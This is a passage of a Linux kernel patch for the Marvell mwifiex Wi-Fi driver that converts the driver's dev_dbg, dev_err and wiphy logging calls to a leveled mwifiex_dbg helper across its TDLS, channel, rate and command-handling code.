ret; } @@ -3138,9 +3188,9 @@ mwifiex_cfg80211_tdls_mgmt(struct wiphy *wiphy, struct net_device *dev, switch (action_code) { case WLAN_TDLS_SETUP_REQUEST: - dev_dbg(priv->adapter->dev, - "Send TDLS Setup Request to %pM status_code=%d\n", peer, - status_code); + mwifiex_dbg(priv->adapter, MSG, + "Send TDLS Setup Request to %pM status_code=%d\n", + peer, status_code); mwifiex_add_auto_tdls_peer(priv, peer); ret = mwifiex_send_tdls_data_frame(priv, peer, action_code, dialog_token, status_code, @@ -3148,45 +3198,45 @@ mwifiex_cfg80211_tdls_mgmt(struct wiphy *wiphy, struct net_device *dev, break; case WLAN_TDLS_SETUP_RESPONSE: mwifiex_add_auto_tdls_peer(priv, peer); - dev_dbg(priv->adapter->dev, - "Send TDLS Setup Response to %pM status_code=%d\n", - peer, status_code); + mwifiex_dbg(priv->adapter, MSG, + "Send TDLS Setup Response to %pM status_code=%d\n", + peer, status_code); ret = mwifiex_send_tdls_data_frame(priv, peer, action_code, dialog_token, status_code, extra_ies, extra_ies_len); break; case WLAN_TDLS_SETUP_CONFIRM: - dev_dbg(priv->adapter->dev, - "Send TDLS Confirm to %pM status_code=%d\n", peer, - status_code); + mwifiex_dbg(priv->adapter, MSG, + "Send TDLS Confirm to %pM status_code=%d\n", peer, + status_code); ret = mwifiex_send_tdls_data_frame(priv, peer, action_code, dialog_token, status_code, extra_ies, extra_ies_len); break; case WLAN_TDLS_TEARDOWN: - dev_dbg(priv->adapter->dev, "Send TDLS Tear down to %pM\n", - peer); + mwifiex_dbg(priv->adapter, MSG, + "Send TDLS Tear down to %pM\n", peer); ret = mwifiex_send_tdls_data_frame(priv, peer, action_code, dialog_token, status_code, extra_ies, extra_ies_len); break; case WLAN_TDLS_DISCOVERY_REQUEST: - dev_dbg(priv->adapter->dev, - "Send TDLS Discovery Request to %pM\n", peer); + mwifiex_dbg(priv->adapter, MSG, + "Send TDLS Discovery Request to %pM\n", peer); ret = mwifiex_send_tdls_data_frame(priv, peer, action_code, dialog_token, status_code, extra_ies, extra_ies_len); break; case WLAN_PUB_ACTION_TDLS_DISCOVER_RES: - dev_dbg(priv->adapter->dev, - "Send TDLS Discovery Response to %pM\n", peer); + mwifiex_dbg(priv->adapter, MSG, + "Send TDLS Discovery Response to %pM\n", peer); ret = mwifiex_send_tdls_action_frame(priv, peer, action_code, dialog_token, status_code, extra_ies, extra_ies_len); break; default: - dev_warn(priv->adapter->dev, - "Unknown TDLS mgmt/action frame %pM\n", peer); + mwifiex_dbg(priv->adapter, ERROR, + "Unknown TDLS mgmt/action frame %pM\n", peer); ret = -EINVAL; break; } @@ -3208,8 +3258,8 @@ mwifiex_cfg80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, if (!(priv->bss_type == MWIFIEX_BSS_TYPE_STA && priv->media_connected)) return -ENOTSUPP; - dev_dbg(priv->adapter->dev, - "TDLS peer=%pM, oper=%d\n", peer, action); + mwifiex_dbg(priv->adapter, MSG, + "TDLS peer=%pM, oper=%d\n", peer, action); switch (action) { case NL80211_TDLS_ENABLE_LINK: @@ -3220,22 +3270,22 @@ mwifiex_cfg80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, break; case NL80211_TDLS_TEARDOWN: /* shouldn't happen!*/ - dev_warn(priv->adapter->dev, - "tdls_oper: teardown from driver not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "tdls_oper: teardown from driver not supported\n"); return -EINVAL; case NL80211_TDLS_SETUP: /* shouldn't happen!*/ - dev_warn(priv->adapter->dev, - "tdls_oper: setup from driver not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "tdls_oper: setup from driver not supported\n"); return -EINVAL; case NL80211_TDLS_DISCOVERY_REQ: /* shouldn't happen!*/ - dev_warn(priv->adapter->dev, - "tdls_oper: discovery from driver not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "tdls_oper: discovery from driver not supported\n"); return -EINVAL; default: - dev_err(priv->adapter->dev, - "tdls_oper: operation not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "tdls_oper: operation not supported\n"); return -ENOTSUPP; } @@ -3268,8 +3318,8 @@ mwifiex_cfg80211_channel_switch(struct wiphy *wiphy, struct net_device *dev, struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); if (priv->adapter->scan_processing) { - dev_err(priv->adapter->dev, - "radar detection: scan in process...\n"); + mwifiex_dbg(priv->adapter, ERROR, + "radar detection: scan in process...\n"); return -EBUSY; } @@ -3284,8 +3334,8 @@ mwifiex_cfg80211_channel_switch(struct wiphy *wiphy, struct net_device *dev, params->beacon_csa.tail, params->beacon_csa.tail_len); if (!chsw_ie) { - dev_err(priv->adapter->dev, - "Could not parse channel switch announcement IE\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Could not parse channel switch announcement IE\n"); return -EINVAL; } @@ -3297,10 +3347,12 @@ mwifiex_cfg80211_channel_switch(struct wiphy *wiphy, struct net_device *dev, } if (mwifiex_del_mgmt_ies(priv)) - wiphy_err(wiphy, "Failed to delete mgmt IEs!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to delete mgmt IEs!\n"); if (mwifiex_set_mgmt_ies(priv, ¶ms->beacon_csa)) { - wiphy_err(wiphy, "%s: setting mgmt ies failed\n", __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: setting mgmt ies failed\n", __func__); return -EFAULT; } @@ -3324,16 +3376,17 @@ mwifiex_cfg80211_start_radar_detection(struct wiphy *wiphy, struct mwifiex_radar_params radar_params; if (priv->adapter->scan_processing) { - dev_err(priv->adapter->dev, - "radar detection: scan already in process...\n"); + mwifiex_dbg(priv->adapter, ERROR, + "radar detection: scan already in process...\n"); return -EBUSY; } if (!mwifiex_is_11h_active(priv)) { - dev_dbg(priv->adapter->dev, "Enable 11h extensions in FW\n"); + mwifiex_dbg(priv->adapter, INFO, + "Enable 11h extensions in FW\n"); if (mwifiex_11h_activate(priv, true)) { - dev_err(priv->adapter->dev, - "Failed to activate 11h extensions!!"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to activate 11h extensions!!"); return -1; } priv->state_11h.is_11h_active = true; @@ -3492,7 +3545,8 @@ int mwifiex_register_cfg80211(struct mwifiex_adapter *adapter) wiphy = wiphy_new(&mwifiex_cfg80211_ops, sizeof(struct mwifiex_adapter *)); if (!wiphy) { - dev_err(adapter->dev, "%s: creating new wiphy\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: creating new wiphy\n", __func__); return -ENOMEM; } wiphy->max_scan_ssids = MWIFIEX_MAX_SSID_LIST_LENGTH; @@ -3563,20 +3617,22 @@ int mwifiex_register_cfg80211(struct mwifiex_adapter *adapter) ret = wiphy_register(wiphy); if (ret < 0) { - dev_err(adapter->dev, - "%s: wiphy_register failed: %d\n", __func__, ret); + mwifiex_dbg(adapter, ERROR, + "%s: wiphy_register failed: %d\n", __func__, ret); wiphy_free(wiphy); return ret; } if (reg_alpha2 && mwifiex_is_valid_alpha2(reg_alpha2)) { - wiphy_info(wiphy, "driver hint alpha2: %2.2s\n", reg_alpha2); + mwifiex_dbg(adapter, INFO, + "driver hint alpha2: %2.2s\n", reg_alpha2); regulatory_hint(wiphy, reg_alpha2); } else { country_code = mwifiex_11d_code_2_region(adapter->region_code); if (country_code) - wiphy_info(wiphy, "ignoring F/W country code %2.2s\n", - country_code); + mwifiex_dbg(adapter, WARN, + "ignoring F/W country code %2.2s\n", + country_code); } mwifiex_send_cmd(priv, HostCmd_CMD_802_11_SNMP_MIB, diff --git a/drivers/net/wireless/mwifiex/cfp.c b/drivers/net/wireless/mwifiex/cfp.c index e9df8826f124..3ddb8ec676ed 100644 --- a/drivers/net/wireless/mwifiex/cfp.c +++ b/drivers/net/wireless/mwifiex/cfp.c @@ -327,8 +327,9 @@ mwifiex_get_cfp(struct mwifiex_private *priv, u8 band, u16 channel, u32 freq) sband = priv->wdev.wiphy->bands[IEEE80211_BAND_5GHZ]; if (!sband) { - dev_err(priv->adapter->dev, "%s: cannot find cfp by band %d\n", - __func__, band); + mwifiex_dbg(priv->adapter, ERROR, + "%s: cannot find cfp by band %d\n", + __func__, band); return cfp; } @@ -349,9 +350,10 @@ mwifiex_get_cfp(struct mwifiex_private *priv, u8 band, u16 channel, u32 freq) } } if (i == sband->n_channels) { - dev_err(priv->adapter->dev, "%s: cannot find cfp by band %d" - " & channel=%d freq=%d\n", __func__, band, channel, - freq); + mwifiex_dbg(priv->adapter, ERROR, + "%s: cannot find cfp by band %d\t" + "& channel=%d freq=%d\n", + __func__, band, channel, freq); } else { if (!ch) return cfp; @@ -431,15 +433,17 @@ u32 mwifiex_get_supported_rates(struct mwifiex_private *priv, u8 *rates) priv->bss_mode == NL80211_IFTYPE_P2P_CLIENT) { switch (adapter->config_bands) { case BAND_B: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_b\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_b\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_b, sizeof(supported_rates_b)); break; case BAND_G: case BAND_G | BAND_GN: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_g\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_g\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_g, sizeof(supported_rates_g)); break; @@ -449,15 +453,17 @@ u32 mwifiex_get_supported_rates(struct mwifiex_private *priv, u8 *rates) case BAND_A | BAND_B | BAND_G | BAND_GN | BAND_AN: case BAND_A | BAND_B | BAND_G | BAND_GN | BAND_AN | BAND_AAC: case BAND_B | BAND_G | BAND_GN: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_bg\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_bg\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_bg, sizeof(supported_rates_bg)); break; case BAND_A: case BAND_A | BAND_G: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_a\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_a\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_a, sizeof(supported_rates_a)); break; @@ -466,14 +472,16 @@ u32 mwifiex_get_supported_rates(struct mwifiex_private *priv, u8 *rates) case BAND_A | BAND_AN | BAND_AAC: case BAND_A | BAND_G | BAND_AN | BAND_GN: case BAND_A | BAND_G | BAND_AN | BAND_GN | BAND_AAC: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_a\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_a\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_a, sizeof(supported_rates_a)); break; case BAND_GN: - dev_dbg(adapter->dev, "info: infra band=%d " - "supported_rates_n\n", adapter->config_bands); + mwifiex_dbg(adapter, INFO, "info: infra band=%d\t" + "supported_rates_n\n", + adapter->config_bands); k = mwifiex_copy_rates(rates, k, supported_rates_n, sizeof(supported_rates_n)); break; @@ -482,25 +490,25 @@ u32 mwifiex_get_supported_rates(struct mwifiex_private *priv, u8 *rates) /* Ad-hoc mode */ switch (adapter->adhoc_start_band) { case BAND_B: - dev_dbg(adapter->dev, "info: adhoc B\n"); + mwifiex_dbg(adapter, INFO, "info: adhoc B\n"); k = mwifiex_copy_rates(rates, k, adhoc_rates_b, sizeof(adhoc_rates_b)); break; case BAND_G: case BAND_G | BAND_GN: - dev_dbg(adapter->dev, "info: adhoc G only\n"); + mwifiex_dbg(adapter, INFO, "info: adhoc G only\n"); k = mwifiex_copy_rates(rates, k, adhoc_rates_g, sizeof(adhoc_rates_g)); break; case BAND_B | BAND_G: case BAND_B | BAND_G | BAND_GN: - dev_dbg(adapter->dev, "info: adhoc BG\n"); + mwifiex_dbg(adapter, INFO, "info: adhoc BG\n"); k = mwifiex_copy_rates(rates, k, adhoc_rates_bg, sizeof(adhoc_rates_bg)); break; case BAND_A: case BAND_A | BAND_AN: - dev_dbg(adapter->dev, "info: adhoc A\n"); + mwifiex_dbg(adapter, INFO, "info: adhoc A\n"); k = mwifiex_copy_rates(rates, k, adhoc_rates_a, sizeof(adhoc_rates_a)); break; diff --git a/drivers/net/wireless/mwifiex/cmdevt.c b/drivers/net/wireless/mwifiex/cmdevt.c index 5b197860b584..ac89a1dd711b 100644 --- a/drivers/net/wireless/mwifiex/cmdevt.c +++ b/drivers/net/wireless/mwifiex/cmdevt.c @@ -62,7 +62,8 @@ mwifiex_get_cmd_node(struct mwifiex_adapter *adapter) spin_lock_irqsave(&adapter->cmd_free_q_lock, flags); if (list_empty(&adapter->cmd_free_q)) { - dev_err(adapter->dev, "GET_CMD_NODE: cmd node not available\n"); + mwifiex_dbg(adapter, ERROR, + "GET_CMD_NODE: cmd node not available\n"); spin_unlock_irqrestore(&adapter->cmd_free_q_lock, flags); return NULL; } @@ -116,7 +117,8 @@ static int mwifiex_cmd_host_cmd(struct mwifiex_private *priv, { /* Copy the HOST command to command buffer */ memcpy(cmd, pcmd_ptr->cmd, pcmd_ptr->len); - dev_dbg(priv->adapter->dev, "cmd: host cmd size = %d\n", pcmd_ptr->len); + mwifiex_dbg(priv->adapter, CMD, + "cmd: host cmd size = %d\n", pcmd_ptr->len); return 0; } @@ -147,8 +149,9 @@ static int mwifiex_dnld_cmd_to_fw(struct mwifiex_private *priv, /* Sanity test */ if (host_cmd == NULL || host_cmd->size == 0) { - dev_err(adapter->dev, "DNLD_CMD: host_cmd is null" - " or cmd size is 0, not sending\n"); + mwifiex_dbg(adapter, ERROR, + "DNLD_CMD: host_cmd is null\t" + "or cmd size is 0, not sending\n"); if (cmd_node->wait_q_enabled) adapter->cmd_wait_q.status = -1; mwifiex_recycle_cmd_node(adapter, cmd_node); @@ -161,8 +164,8 @@ static int mwifiex_dnld_cmd_to_fw(struct mwifiex_private *priv, if (adapter->hw_status == MWIFIEX_HW_STATUS_RESET && cmd_code != HostCmd_CMD_FUNC_SHUTDOWN && cmd_code != HostCmd_CMD_FUNC_INIT) { - dev_err(adapter->dev, - "DNLD_CMD: FW in reset state, ignore cmd %#x\n", + mwifiex_dbg(adapter, ERROR, + "DNLD_CMD: FW in reset state, ignore cmd %#x\n", cmd_code); if (cmd_node->wait_q_enabled) mwifiex_complete_cmd(adapter, cmd_node); @@ -197,10 +200,11 @@ static int mwifiex_dnld_cmd_to_fw(struct mwifiex_private *priv, */ skb_put(cmd_node->cmd_skb, cmd_size - cmd_node->cmd_skb->len); - dev_dbg(adapter->dev, - "cmd: DNLD_CMD: %#x, act %#x, len %d, seqno %#x\n", cmd_code, - le16_to_cpu(*(__le16 *) ((u8 *) host_cmd + S_DS_GEN)), cmd_size, - le16_to_cpu(host_cmd->seq_num)); + mwifiex_dbg(adapter, CMD, + "cmd: DNLD_CMD: %#x, act %#x, len %d, seqno %#x\n", + cmd_code, + le16_to_cpu(*(__le16 *)((u8 *)host_cmd + S_DS_GEN)), + cmd_size, le16_to_cpu(host_cmd->seq_num)); mwifiex_dbg_dump(adapter, CMD_D, "cmd buffer:", host_cmd, cmd_size); if (adapter->iface_type == MWIFIEX_USB) { @@ -222,7 +226,8 @@ static int mwifiex_dnld_cmd_to_fw(struct mwifiex_private *priv, } if (ret == -1) { - dev_err(adapter->dev, "DNLD_CMD: host to card failed\n"); + mwifiex_dbg(adapter, ERROR, + "DNLD_CMD: host to card failed\n"); if (adapter->iface_type == MWIFIEX_USB) adapter->cmd_sent = false; if (cmd_node->wait_q_enabled) @@ -281,8 +286,8 @@ static int mwifiex_dnld_sleep_confirm_cmd(struct mwifiex_adapter *adapter) (adapter->seq_num, priv->bss_num, priv->bss_type))); - dev_dbg(adapter->dev, - "cmd: DNLD_CMD: %#x, act %#x, len %d, seqno %#x\n", + mwifiex_dbg(adapter, CMD, + "cmd: DNLD_CMD: %#x, act %#x, len %d, seqno %#x\n", le16_to_cpu(sleep_cfm_buf->command), le16_to_cpu(sleep_cfm_buf->action), le16_to_cpu(sleep_cfm_buf->size), @@ -314,7 +319,7 @@ static int mwifiex_dnld_sleep_confirm_cmd(struct mwifiex_adapter *adapter) } if (ret == -1) { - dev_err(adapter->dev, "SLEEP_CFM: failed\n"); + mwifiex_dbg(adapter, ERROR, "SLEEP_CFM: failed\n"); adapter->dbg.num_cmd_sleep_cfm_host_to_card_failure++; return -1; } @@ -365,8 +370,8 @@ int mwifiex_alloc_cmd_buffer(struct mwifiex_adapter *adapter) for (i = 0; i < MWIFIEX_NUM_OF_CMD_BUFFER; i++) { cmd_array[i].skb = dev_alloc_skb(MWIFIEX_SIZE_OF_CMD_BUFFER); if (!cmd_array[i].skb) { - dev_err(adapter->dev, - "unable to allocate command buffer\n"); + mwifiex_dbg(adapter, ERROR, + "unable to allocate command buffer\n"); return -ENOMEM; } } @@ -390,7 +395,8 @@ int mwifiex_free_cmd_buffer(struct mwifiex_adapter *adapter) /* Need to check if cmd pool is allocated or not */ if (!adapter->cmd_pool) { - dev_dbg(adapter->dev, "info: FREE_CMD_BUF: cmd_pool is null\n"); + mwifiex_dbg(adapter, FATAL, + "info: FREE_CMD_BUF: cmd_pool is null\n"); return 0; } @@ -399,7 +405,8 @@ int mwifiex_free_cmd_buffer(struct mwifiex_adapter *adapter) /* Release shared memory buffers */ for (i = 0; i < MWIFIEX_NUM_OF_CMD_BUFFER; i++) { if (cmd_array[i].skb) { - dev_dbg(adapter->dev, "cmd: free cmd buffer %d\n", i); + mwifiex_dbg(adapter, CMD, + "cmd: free cmd buffer %d\n", i); dev_kfree_skb_any(cmd_array[i].skb); } if (!cmd_array[i].resp_skb) @@ -413,7 +420,8 @@ int mwifiex_free_cmd_buffer(struct mwifiex_adapter *adapter) } /* Release struct cmd_ctrl_node */ if (adapter->cmd_pool) { - dev_dbg(adapter->dev, "cmd: free cmd pool\n"); + mwifiex_dbg(adapter, CMD, + "cmd: free cmd pool\n"); kfree(adapter->cmd_pool); adapter->cmd_pool = NULL; } @@ -463,7 +471,7 @@ int mwifiex_process_event(struct mwifiex_adapter *adapter) rx_info->bss_type = priv->bss_type; } - dev_dbg(adapter->dev, "EVENT: cause: %#x\n", eventcause); + mwifiex_dbg(adapter, EVENT, "EVENT: cause: %#x\n", eventcause); mwifiex_dbg_dump(adapter, EVT_D, "Event Buf:", skb->data, skb->len); if (priv->bss_role == MWIFIEX_BSS_ROLE_UAP) @@ -503,28 +511,33 @@ int mwifiex_send_cmd(struct mwifiex_private *priv, u16 cmd_no, } if (adapter->is_suspended) { - dev_err(adapter->dev, "PREP_CMD: device in suspended state\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: device in suspended state\n"); return -1; } if (adapter->hs_enabling && cmd_no != HostCmd_CMD_802_11_HS_CFG_ENH) { - dev_err(adapter->dev, "PREP_CMD: host entering sleep state\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: host entering sleep state\n"); return -1; } if (adapter->surprise_removed) { - dev_err(adapter->dev, "PREP_CMD: card is removed\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: card is removed\n"); return -1; } if (adapter->is_cmd_timedout) { - dev_err(adapter->dev, "PREP_CMD: FW is in bad state\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: FW is in bad state\n"); return -1; } if (adapter->hw_status == MWIFIEX_HW_STATUS_RESET) { if (cmd_no != HostCmd_CMD_FUNC_INIT) { - dev_err(adapter->dev, "PREP_CMD: FW in reset state\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: FW in reset state\n"); return -1; } } @@ -533,7 +546,8 @@ int mwifiex_send_cmd(struct mwifiex_private *priv, u16 cmd_no, cmd_node = mwifiex_get_cmd_node(adapter); if (!cmd_node) { - dev_err(adapter->dev, "PREP_CMD: no free cmd node\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: no free cmd node\n"); return -1; } @@ -541,7 +555,8 @@ int mwifiex_send_cmd(struct mwifiex_private *priv, u16 cmd_no, mwifiex_init_cmd_node(priv, cmd_node, cmd_oid, data_buf, sync); if (!cmd_node->cmd_skb) { - dev_err(adapter->dev, "PREP_CMD: no free cmd buf\n"); + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: no free cmd buf\n"); return -1; } @@ -576,7 +591,8 @@ int mwifiex_send_cmd(struct mwifiex_private *priv, u16 cmd_no, /* Return error, since the command preparation failed */ if (ret) { - dev_err(adapter->dev, "PREP_CMD: cmd %#x preparation failed\n", + mwifiex_dbg(adapter, ERROR, + "PREP_CMD: cmd %#x preparation failed\n", cmd_no); mwifiex_insert_cmd_to_free_q(adapter, cmd_node); return -1; @@ -631,7 +647,8 @@ void mwifiex_recycle_cmd_node(struct mwifiex_adapter *adapter, mwifiex_insert_cmd_to_free_q(adapter, cmd_node); atomic_dec(&adapter->cmd_pending); - dev_dbg(adapter->dev, "cmd: FREE_CMD: cmd=%#x, cmd_pending=%d\n", + mwifiex_dbg(adapter, CMD, + "cmd: FREE_CMD: cmd=%#x, cmd_pending=%d\n", le16_to_cpu(host_cmd->command), atomic_read(&adapter->cmd_pending)); } @@ -653,7 +670,7 @@ mwifiex_insert_cmd_to_pending_q(struct mwifiex_adapter *adapter, host_cmd = (struct host_cmd_ds_command *) (cmd_node->cmd_skb->data); if (!host_cmd) { - dev_err(adapter->dev, "QUEUE_CMD: host_cmd is NULL\n"); + mwifiex_dbg(adapter, ERROR, "QUEUE_CMD: host_cmd is NULL\n"); return; } @@ -678,7 +695,8 @@ mwifiex_insert_cmd_to_pending_q(struct mwifiex_adapter *adapter, spin_unlock_irqrestore(&adapter->cmd_pending_q_lock, flags); atomic_inc(&adapter->cmd_pending); - dev_dbg(adapter->dev, "cmd: QUEUE_CMD: cmd=%#x, cmd_pending=%d\n", + mwifiex_dbg(adapter, CMD, + "cmd: QUEUE_CMD: cmd=%#x, cmd_pending=%d\n", command, atomic_read(&adapter->cmd_pending)); } @@ -704,7 +722,8 @@ int mwifiex_exec_next_cmd(struct mwifiex_adapter *adapter) /* Check if already in processing */ if (adapter->curr_cmd) { - dev_err(adapter->dev, "EXEC_NEXT_CMD: cmd in processing\n"); + mwifiex_dbg(adapter, FATAL, + "EXEC_NEXT_CMD: cmd in processing\n"); return -1; } @@ -726,8 +745,9 @@ int mwifiex_exec_next_cmd(struct mwifiex_adapter *adapter) priv = cmd_node->priv; if (adapter->ps_state != PS_STATE_AWAKE) { - dev_err(adapter->dev, "%s: cannot send cmd in sleep state," - " this should not happen\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: cannot send cmd in sleep state,\t" + "this should not happen\n", __func__); spin_unlock_irqrestore(&adapter->mwifiex_cmd_lock, cmd_flags); return ret; } @@ -777,8 +797,9 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) if (!adapter->curr_cmd || !adapter->curr_cmd->resp_skb) { resp = (struct host_cmd_ds_command *) adapter->upld_buf; - dev_err(adapter->dev, "CMD_RESP: NULL curr_cmd, %#x\n", - le16_to_cpu(resp->command)); + mwifiex_dbg(adapter, ERROR, + "CMD_RESP: NULL curr_cmd, %#x\n", + le16_to_cpu(resp->command)); return -1; } @@ -786,8 +807,9 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) resp = (struct host_cmd_ds_command *) adapter->curr_cmd->resp_skb->data; if (adapter->curr_cmd->cmd_flag & CMD_F_CANCELED) { - dev_err(adapter->dev, "CMD_RESP: %#x been canceled\n", - le16_to_cpu(resp->command)); + mwifiex_dbg(adapter, ERROR, + "CMD_RESP: %#x been canceled\n", + le16_to_cpu(resp->command)); mwifiex_recycle_cmd_node(adapter, adapter->curr_cmd); spin_lock_irqsave(&adapter->mwifiex_cmd_lock, flags); adapter->curr_cmd = NULL; @@ -799,7 +821,8 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) /* Copy original response back to response buffer */ struct mwifiex_ds_misc_cmd *hostcmd; uint16_t size = le16_to_cpu(resp->size); - dev_dbg(adapter->dev, "info: host cmd resp size = %d\n", size); + mwifiex_dbg(adapter, INFO, + "info: host cmd resp size = %d\n", size); size = min_t(u16, size, MWIFIEX_SIZE_OF_CMD_BUFFER); if (adapter->curr_cmd->data_buf) { hostcmd = adapter->curr_cmd->data_buf; @@ -827,15 +850,15 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) adapter->dbg.last_cmd_resp_id[adapter->dbg.last_cmd_resp_index] = orig_cmdresp_no; - dev_dbg(adapter->dev, - "cmd: CMD_RESP: 0x%x, result %d, len %d, seqno 0x%x\n", - orig_cmdresp_no, cmdresp_result, - le16_to_cpu(resp->size), le16_to_cpu(resp->seq_num)); + mwifiex_dbg(adapter, CMD, + "cmd: CMD_RESP: 0x%x, result %d, len %d, seqno 0x%x\n", + orig_cmdresp_no, cmdresp_result, + le16_to_cpu(resp->size), le16_to_cpu(resp->seq_num)); mwifiex_dbg_dump(adapter, CMD_D, "CMD_RESP buffer:", resp, le16_to_cpu(resp->size)); if (!(orig_cmdresp_no & HostCmd_RET_BIT)) { - dev_err(adapter->dev, "CMD_RESP: invalid cmd resp\n"); + mwifiex_dbg(adapter, ERROR, "CMD_RESP: invalid cmd resp\n"); if (adapter->curr_cmd->wait_q_enabled) adapter->cmd_wait_q.status = -1; @@ -859,8 +882,9 @@ int mwifiex_process_cmdresp(struct mwifiex_adapter *adapter) /* Check init command response */ if (adapter->hw_status == MWIFIEX_HW_STATUS_INITIALIZING) { if (ret) { - dev_err(adapter->dev, "%s: cmd %#x failed during " - "initialization\n", __func__, cmdresp_no); + mwifiex_dbg(adapter, ERROR, + "%s: cmd %#x failed during\t" + "initialization\n", __func__, cmdresp_no); mwifiex_init_fw_complete(adapter); return -1; } else if (adapter->last_init_cmd == cmdresp_no) @@ -895,7 +919,8 @@ mwifiex_cmd_timeout_func(unsigned long function_context) adapter->is_cmd_timedout = 1; if (!adapter->curr_cmd) { - dev_dbg(adapter->dev, "cmd: empty curr_cmd\n"); + mwifiex_dbg(adapter, ERROR, + "cmd: empty curr_cmd\n"); return; } cmd_node = adapter->curr_cmd; @@ -904,47 +929,60 @@ mwifiex_cmd_timeout_func(unsigned long function_context) adapter->dbg.last_cmd_id[adapter->dbg.last_cmd_index]; adapter->dbg.timeout_cmd_act = adapter->dbg.last_cmd_act[adapter->dbg.last_cmd_index]; - dev_err(adapter->dev, - "%s: Timeout cmd id = %#x, act = %#x\n", __func__, - adapter->dbg.timeout_cmd_id, - adapter->dbg.timeout_cmd_act); - - dev_err(adapter->dev, "num_data_h2c_failure = %d\n", - adapter->dbg.num_tx_host_to_card_failure); - dev_err(adapter->dev, "num_cmd_h2c_failure = %d\n", - adapter->dbg.num_cmd_host_to_card_failure); - - dev_err(adapter->dev, "is_cmd_timedout = %d\n", - adapter->is_cmd_timedout); - dev_err(adapter->dev, "num_tx_timeout = %d\n", - adapter->dbg.num_tx_timeout); - - dev_err(adapter->dev, "last_cmd_index = %d\n", - adapter->dbg.last_cmd_index); - dev_err(adapter->dev, "last_cmd_id: %*ph\n", - (int)sizeof(adapter->dbg.last_cmd_id), - adapter->dbg.last_cmd_id); - dev_err(adapter->dev, "last_cmd_act: %*ph\n", - (int)sizeof(adapter->dbg.last_cmd_act), - adapter->dbg.last_cmd_act); - - dev_err(adapter->dev, "last_cmd_resp_index = %d\n", - adapter->dbg.last_cmd_resp_index); - dev_err(adapter->dev, "last_cmd_resp_id: %*ph\n", - (int)sizeof(adapter->dbg.last_cmd_resp_id), - adapter->dbg.last_cmd_resp_id); - - dev_err(adapter->dev, "last_event_index = %d\n", - adapter->dbg.last_event_index); - dev_err(adapter->dev, "last_event: %*ph\n", - (int)sizeof(adapter->dbg.last_event), - adapter->dbg.last_event); - - dev_err(adapter->dev, "data_sent=%d cmd_sent=%d\n", - adapter->data_sent, adapter->cmd_sent); - - dev_err(adapter->dev, "ps_mode=%d ps_state=%d\n", - adapter->ps_mode, adapter->ps_state); + mwifiex_dbg(adapter, MSG, + "%s: Timeout cmd id = %#x, act = %#x\n", __func__, + adapter->dbg.timeout_cmd_id, + adapter->dbg.timeout_cmd_act); + + mwifiex_dbg(adapter, MSG, + "num_data_h2c_failure = %d\n", + adapter->dbg.num_tx_host_to_card_failure); + mwifiex_dbg(adapter, MSG, + "num_cmd_h2c_failure = %d\n", + adapter->dbg.num_cmd_host_to_card_failure); + + mwifiex_dbg(adapter, MSG, + "is_cmd_timedout = %d\n", + adapter->is_cmd_timedout); + mwifiex_dbg(adapter, MSG, + "num_tx_timeout = %d\n", + adapter->dbg.num_tx_timeout); + + mwifiex_dbg(adapter, MSG, + "last_cmd_index = %d\n", + adapter->dbg.last_cmd_index); + mwifiex_dbg(adapter, MSG, + "last_cmd_id: %*ph\n", + (int)sizeof(adapter->dbg.last_cmd_id), + adapter->dbg.last_cmd_id); + mwifiex_dbg(adapter, MSG, + "last_cmd_act: %*ph\n", + (int)sizeof(adapter->dbg.last_cmd_act), + adapter->dbg.last_cmd_act); + + mwifiex_dbg(adapter, MSG, + "last_cmd_resp_index = %d\n", + adapter->dbg.last_cmd_resp_index); + mwifiex_dbg(adapter, MSG, + "last_cmd_resp_id: %*ph\n", + (int)sizeof(adapter->dbg.last_cmd_resp_id), + adapter->dbg.last_cmd_resp_id); + + mwifiex_dbg(adapter, MSG, + "last_event_index = %d\n", + adapter->dbg.last_event_index); + mwifiex_dbg(adapter, MSG, + "last_event: %*ph\n", + (int)sizeof(adapter->dbg.last_event), + adapter->dbg.last_event); + + mwifiex_dbg(adapter, MSG, + "data_sent=%d cmd_sent=%d\n", + adapter->data_sent, 